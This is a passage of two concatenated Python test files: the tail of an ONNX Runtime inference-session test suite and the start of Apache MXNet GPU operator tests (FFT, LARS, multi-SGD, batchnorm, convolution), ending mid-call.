{'input1:0': a, 'input:0': b}) def testSequenceLength(self): sess = onnxrt.InferenceSession(self.get_name("sequence_length.onnx")) x = [ np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)), np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)) ] x_name = sess.get_inputs()[0].name self.assertEqual(x_name, "X") x_type = sess.get_inputs()[0].type self.assertEqual(x_type, 'seq(tensor(float))') output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'tensor(int64)') output_expected = np.array(2, dtype=np.int64) res = sess.run([output_name], {x_name: x}) self.assertEqual(output_expected, res[0]) def testSequenceConstruct(self): sess = onnxrt.InferenceSession(self.get_name("sequence_construct.onnx")) self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)') self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)') self.assertEqual(sess.get_inputs()[0].name, "tensor1") self.assertEqual(sess.get_inputs()[1].name, "tensor2") output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output_sequence") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'seq(tensor(int64))') output_expected = [ np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)), np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3)) ] res = sess.run( [output_name], { "tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)), "tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3)) }) np.testing.assert_array_equal(output_expected, res[0]) def testSequenceInsert(self): opt = onnxrt.SessionOptions() opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL sess = onnxrt.InferenceSession(self.get_name("sequence_insert.onnx"), sess_options=opt) self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))') self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)') self.assertEqual(sess.get_inputs()[0].name, "input_seq") self.assertEqual(sess.get_inputs()[1].name, "tensor") output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "output_sequence") output_type = sess.get_outputs()[0].type self.assertEqual(output_type, 'seq(tensor(int64))') output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))] res = sess.run([output_name], { "tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)), "input_seq": [] }) np.testing.assert_array_equal(output_expected, res[0]) def testOrtExecutionMode(self): opt = onnxrt.SessionOptions() self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL) opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL) def testLoadingSessionOptionsFromModel(self): try: os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1) sess = onnxrt.InferenceSession(self.get_name("model_with_valid_ort_config_json.onnx")) session_options = sess.get_session_options() self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config self.assertEqual(session_options.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config) self.assertEqual(session_options.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config self.assertEqual(session_options.enable_profiling, True) # from the ORT config except Exception: raise finally: # Make sure the usage of the feature is disabled after this test os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0) if __name__ == '__main__': unittest.main()
test_operator_gpu.py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from __future__ import print_function import sys import os import time import multiprocessing as mp import mxnet as mx import numpy as np import pytest import itertools from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose from mxnet.test_utils import check_symbolic_forward, check_symbolic_backward, discard_stderr from mxnet.test_utils import default_context, rand_shape_2d, rand_ndarray, same, environment from mxnet.base import MXNetError from mxnet import autograd curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__))) sys.path.insert(0, os.path.join(curr_path, '../unittest')) from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied from common import run_in_spawned_process from test_operator import check_sequence_reverse, allclose_function from test_operator import * from test_numpy_ndarray import * from test_numpy_op import * from test_numpy_interoperability import * from test_gluon_probability_v1 import * from test_gluon_probability_v2 import * from test_optimizer import * from test_random import * from test_exc_handling import * from test_sparse_ndarray import * from test_sparse_operator import * from test_ndarray import * from test_subgraph_op import * from test_gluon_gpu import _test_bulking from test_contrib_operator import test_multibox_target_op from test_contrib_optimizer import test_adamw del test_custom_op_fork #noqa set_default_context(mx.gpu(0)) def check_countsketch(in_dim,out_dim,n): data = mx.sym.Variable("data") h = mx.sym.Variable("h") s = mx.sym.Variable("s") sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim) shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s arr = [mx.nd.empty(shape[i]) for i in range(3)] arr_grad = [mx.nd.empty(shape[i]) for i in range(3)] x = np.random.uniform(-10, 10, shape[0]) arr[0][:] = x #input x h = np.random.randint(0, out_dim, shape[1]) arr[1][:] = h #hash h s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2]) arr[2][:] = s #hash s locations = {"data": x, "h": h, "s": s} a = np.zeros((n,out_dim)) temp = np.multiply(x, s) for num_sample in np.arange(0,n): for idx in np.arange(0,in_dim): a[num_sample][h[0][idx]] += temp[num_sample][idx] check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0)) out_grad = mx.nd.empty((n,out_dim)) out_grad[:] = np.random.normal(-3, 3, (n,out_dim)) a = np.zeros((n,in_dim)) for j in np.arange(0,n): for i in np.arange(0,in_dim): a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i] check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0)) @with_seed() @pytest.mark.serial def test_countsketch(): minindim = 40 maxindim = 100 minoutdim = 5 maxoutdim = 30 maxn = 200 in_dim = np.random.randint(minindim, maxindim) out_dim = np.random.randint(minoutdim, maxoutdim) n = np.random.randint(1, maxn) check_countsketch(in_dim, out_dim, n) def check_fft(shape): sym = mx.sym.contrib.fft(name='fft', compute_size = 128) if len(shape) == 2: if shape[1]%2 != 0: lst = list(shape) lst[1] = lst[1]*2 shape = tuple(lst) shape_old = shape if len(shape) == 4: if shape[3]%2 != 0: lst = list(shape) lst[3] = lst[3]*2 shape = tuple(lst) shape_old = shape init = [np.random.normal(size=shape, scale=1.0)] arr_grad = [mx.nd.empty(shape)] ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}] exe_list = [sym._simple_bind(**ctx) for ctx in ctx_list] for exe in exe_list: for arr, iarr in zip(exe.arg_arrays, init): arr[:] = iarr.astype(arr.dtype) # forward for exe in exe_list: exe.forward(is_train=True) out1 = [exe.outputs[0].asnumpy() for exe in exe_list] out = np.fft.fft(init, n=None, axis=-1, norm=None) if len(shape) == 2: out = np.reshape(out,(out.shape[1],out.shape[2])) out2 = np.append(out.real, out.imag, axis = 1) a = np.zeros(out1[0].shape) p = 0 for i in range(out2.shape[1]//2): a[:,p] = out2[:,i] a[:,p+1] = out2[:,i+out2.shape[1]//2] p = p+2 if len(shape) == 4: out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4])) out2 = np.append(out.real, out.imag, axis = 1) a = np.zeros(out1[0].shape) for i in range(out1[0].shape[0]): for j in range(out1[0].shape[1]): p = 0 for k in range(out2.shape[3]): a[i,j,:,p] = out2[i,j,:,k] a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k] p = p+2 assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5) # backward if len(shape) == 2: out_grad = mx.nd.empty((shape[0],2*shape[1])) out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1])) # out_grad_to_complex out_grad_complex = np.zeros(shape,dtype = np.complex64) for i in range(0,shape[1]): out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i] out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1] for exe in exe_list: exe.backward([out_grad]) a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None) assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5) if len(shape) == 4: out_grad = mx.nd.empty(out1[0].shape) out_grad[:] = np.random.normal(-3, 3, out1[0].shape) # out_grad_to_complex out_grad_complex = np.zeros(shape,dtype = np.complex64) for i in range(0,shape[3]): out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i] out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1] for exe in exe_list: exe.backward([out_grad]) a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None) assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5) @with_seed() def test_fft(): nrepeat = 2 maxdim = 10 for repeat in range(nrepeat): for order in [2,4]: shape = tuple(np.random.randint(1, maxdim, size=order)) check_fft(shape) def _make_ndarrays(input_list, ctx=mx.gpu(0)): return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list] def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2): values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes] mx_vals = _make_ndarrays(values_arr, ctx=ctx) sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes)) sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes)) # checks that operator is deterministic assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy()) ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr], dtype='float32', ctx=ctx) assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1) @with_seed() @pytest.mark.serial def test_multi_sum_sq(): min_nparam = 100 max_nparam = 120 min_dim = 50000 max_dim = 100000 max_ndim = 1 dtypes = ['float16','float32', 'float64'] for ctx in [mx.gpu(0)]: for dtype in dtypes: nparam = np.random.randint(min_nparam + 1, max_nparam + 1) shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)] low_tol = ctx == mx.cpu(0) and ('float16'in [dtype]) tol1 = 1e-3 if low_tol else 1e-5 tol2 = 1e-6 if low_tol else 1e-7 check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2) def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2): weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes] grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes] lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100. wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000. eta = (np.random.rand() + 0.1) eps = (np.random.rand() + 0.1) / 10000. mx_w = _make_ndarrays(weights_arr, ctx=ctx) mx_g = _make_ndarrays(grads_arr, ctx=ctx) mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx) mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx) w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes)) g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes)) ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr], dtype='float32', ctx=ctx) ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr], dtype='float32', ctx=ctx) assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1) assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1) rescale_grad = (np.random.rand() + 0.5) * 100. mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps, rescale_grad=rescale_grad) ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq) ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad) ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx) for i in range(ref_w_l2norm.size): _w = ref_w_l2norm[i] _g = ref_g_l2norm[i] if _w > 0.0 and _g > 0.0: ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps) else: ref_new_lrs[i] = lrs[i] assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2) @with_seed() @pytest.mark.serial def test_fast_lars(): min_nparam = 50 max_nparam = 60 maxdim = 10000 maxndim = 1 dtypes = ['float16','float32', 'float64'] for ctx in [mx.cpu(0), mx.gpu(0)]: for w_dtype in dtypes: for g_dtype in dtypes: nparam = np.random.randint(min_nparam + 1, max_nparam + 1) shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)] lowTol = ctx == mx.cpu(0) and ('float16'in [w_dtype, g_dtype]) tol1 = 1e-3 if lowTol else 1e-5 tol2 = 1e-6 if lowTol else 1e-7 check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2) def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights): def _flatten_list(nested_list): return [item for sublist in nested_list for item in sublist] weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes] grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes] rescale_grad = (np.random.random() + 1.0) mx_w = _make_ndarrays(weights_arr) mx_g = _make_ndarrays(grads_arr) mx_p_w = _make_ndarrays(weights_arr) mx_p_g = _make_ndarrays(grads_arr) lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.) mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0)) wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.) mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0)) if use_master_weights: weights32_arr = [arr.astype('float32') for arr in weights_arr] mx_w32 = _make_ndarrays(weights32_arr) mx_p_w32 = _make_ndarrays(weights32_arr) if momentum is None: if use_master_weights: mx.nd.multi_mp_sgd_update( *_flatten_list(zip(mx_w, mx_g, mx_w32)), num_weights=len(shapes), lrs=lrs, wds=wds, rescale_grad=rescale_grad, out=mx_w) mx.nd.preloaded_multi_mp_sgd_update( *(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) + [mx_lrs, mx_wds]), num_weights=len(shapes), rescale_grad=rescale_grad, out=mx_p_w) else: out = mx.nd.multi_sgd_update( *_flatten_list(zip(mx_w, mx_g)), num_weights=len(shapes), lrs=lrs, wds=wds, rescale_grad=rescale_grad, out=mx_w) preloaded_out = mx.nd.preloaded_multi_sgd_update( *(_flatten_list(zip(mx_p_w, mx_p_g)) + [mx_lrs, mx_wds]), num_weights=len(shapes), rescale_grad=rescale_grad, out=mx_p_w) else: if use_master_weights: momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes] mx_m = _make_ndarrays(momentums_arr) mx_p_m = _make_ndarrays(momentums_arr) out = mx.nd.multi_mp_sgd_mom_update( *_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)), num_weights=len(shapes), lrs=lrs, wds=wds, rescale_grad=0.95, momentum=momentum, out=mx_w) preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update( *(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) + [mx_lrs, mx_wds]), num_weights=len(shapes), rescale_grad=0.95, momentum=momentum, out=mx_p_w) else: momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes] mx_m = _make_ndarrays(momentums_arr) mx_p_m = _make_ndarrays(momentums_arr) mx.nd.multi_sgd_mom_update( *_flatten_list(zip(mx_w, mx_g, mx_m)), num_weights=len(shapes), lrs=lrs, wds=wds, rescale_grad=0.95, momentum=momentum, out=mx_w) mx.nd.preloaded_multi_sgd_mom_update( *(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) + [mx_lrs, mx_wds]), num_weights=len(shapes), rescale_grad=0.95, momentum=momentum, out=mx_p_w) def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol): for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)): assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol) if dtype == 'float16': rtol = 1e-3 atol = 1e-2 else: rtol = 1e-5 atol = 1e-6 _assert_all_almost_equal(mx_p_w, mx_w, rtol, atol) if momentum is not None: _assert_all_almost_equal(mx_p_m, mx_m, rtol, atol) if use_master_weights: _assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6) @with_seed() def test_preloaded_multi_sgd(): dtypes = ['float16', 'float32'] momentums = [None, 0.9] min_nparam = 5 max_nparam = 10 maxdim = 6 maxndim = 4 for dtype in dtypes: use_master_weights_list = [False,] if dtype == 'float32' else [True, False] for use_master_weights in use_master_weights_list: for momentum in momentums: nparam = np.random.randint(min_nparam + 1, max_nparam + 1) shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)] check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights) @with_seed() @pytest.mark.serial def test_batchnorm_with_type(): ctx_list_v2_2D = [ {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}}, ] ctx_list_v2_1D = [ {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}}, ] ctx_list_v2_3D = [ {'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}, {'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}} ] # V2, 2D bools = [False, True] for fix_gamma, cudnn_off in itertools.product(bools, bools): sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off) check_consistency(sym, ctx_list_v2_2D) # V2, 1D for fix_gamma, cudnn_off in itertools.product(bools, bools): sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off) check_consistency(sym, ctx_list_v2_1D) # V2, 3D for fix_gamma, cudnn_off in itertools.product(bools, [True,]): sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off) check_consistency(sym, ctx_list_v2_3D) @with_seed() @pytest.mark.serial def test_batchnorm_versions(): def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats): ctx_list = [] sym_list = [] # BatchNorm cpu if 'batchnorm_cpu' in batchnorm_op_list: ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma, use_global_stats=use_global_stats, name='batchnorm')) # BatchNorm gpu (organic) if 'batchnorm_gpu' in batchnorm_op_list: ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma, use_global_stats=use_global_stats, name='batchnorm', cudnn_off=True)) # BatchNorm gpu cudnn (if cudnn is enabled) if 'batchnorm_cudnn' in batchnorm_op_list: ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma, use_global_stats=use_global_stats, name='batchnorm', cudnn_off=False)) check_consistency(sym_list, ctx_list) def test_1d_batchnorm(fix_gamma, use_global_stats): data = (2, 3, 20) test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu', 'batchnorm_gpu', 'batchnorm_cudnn'], data=data, fix_gamma=fix_gamma, use_global_stats=use_global_stats) def test_2d_batchnorm(fix_gamma, use_global_stats): data = (2, 3, 10, 10) test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu', 'batchnorm_gpu', 'batchnorm_cudnn'], data=data, fix_gamma=fix_gamma, use_global_stats=use_global_stats) def test_3d_batchnorm(fix_gamma, use_global_stats): data = (2, 3, 3, 5, 5) test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu', 'batchnorm_gpu'], data=data, fix_gamma=fix_gamma, use_global_stats=use_global_stats) test_1d_batchnorm(True, False) test_1d_batchnorm(False, False) test_1d_batchnorm(False, True) test_1d_batchnorm(True, True) test_2d_batchnorm(True, False) test_2d_batchnorm(False, False) test_2d_batchnorm(False, True) test_2d_batchnorm(True, True) test_3d_batchnorm(True, False) test_3d_batchnorm(False, False) test_3d_batchnorm(False, True) test_3d_batchnorm(True, True) @with_seed(1234) @assert_raises_cudnn_not_satisfied(min_version='5.1.10') @pytest.mark.serial def test_convolution_with_type(): sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv') data = mx.sym.Variable('conv_data') w = mx.sym.Variable('conv_weight') b = mx.sym.Variable('conv_bias') w = mx.sym.transpose(w, axes=(0,2,3,1)) sym2 = mx.sym.transpose(data, axes=(0,2,3,1)) sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3)) sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv') sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2] ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}}, # NHWC {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3), 'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3), 'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}} ] # wider tolerance needed for true-fp16 NCHW test above tol = {np.dtype(np.float16): 0.5, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, rtol=tol, atol=tol) # test ability to turn off training on bias check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, rtol=tol, atol=tol) # Apply N symbols against each of M contexts, checking that all NxM combinations match. def check_consistency_NxM(sym_list, ctx_list): # e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are: # sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3] check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5) @pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141") @with_seed() @pytest.mark.serial def test_convolution_options(): # 1D convolution ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}] # Pad > 0 sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 1x1 convolution sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 2D convolution ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}] # Pad > 0 sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 1x1 convolution sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 3D convolution ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] # Pad > 0 sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') check_consistency_NxM([sym, 